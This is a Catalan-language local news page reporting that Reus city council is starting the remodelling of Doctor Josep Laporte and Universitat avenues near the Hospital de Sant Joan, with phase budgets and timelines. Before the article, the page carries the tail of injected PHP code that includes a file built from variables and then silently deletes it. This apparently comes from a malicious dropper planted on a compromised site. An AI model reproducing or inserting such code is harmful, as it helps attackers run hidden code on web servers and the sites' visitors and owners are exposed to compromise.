");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Reus inicia les obres de remodelació de les avingudes de l’entorn de l’Hospital
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L'Ajuntament de Reus inicia les obres de remodelació de les avingudes de l’entorn de l’Hospital (02/01/2020)

’Ajuntament de Reus ha aprovat de manera definitiva les fases 1 i 2 del projecte d'urbanització de l'entorn de l'Hospital de Sant Joan, que comporta l’acabament i remodelació de les avingudes del Doctor Josep Laporte i de la Universitat; i ha obert concurs públic per adjudicar els treballs de la fase 1, que afecta la coca central de l'avinguda de Josep Laporte.

Al llarg d’aquesta avinguda, es millora la jardineria i s’hi preveuen treballs de pavimentació. Se substitueixen les graves i formigó que hi ha actualment per asfalt i llambordins de formigó. Les seccions s’han dissenyat en base a donar una major accessibilitat i comoditat als vianants (adaptades per a minusvàlids).

Es preveu que l’obra d'aquesta primera fase es realitzi en un termini de 4 mesos; i el pressupost de licitació és de 139.980,92 euros (IVA inclòs)

La fase 2, que s'adjudicarà pròximament, preveu actuar en el paviment i la jardineria de la vorera més allunyada de l’equipament sanitari, aixi com en la jardineria a la avinguda de la Universitat i de les dues rotondes als extrems de l’avinguda de Josep Laporte.

El conjunt de les dues fases del projecte té un pressupost de 302.822,79 euros. La superfície total a actuar és de 5.944 m2., i es contemplen obres de demolicions i arrencaments, moviment de terres, pavimentació, jardineria i reg.

Font: Ajuntament de Reus

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona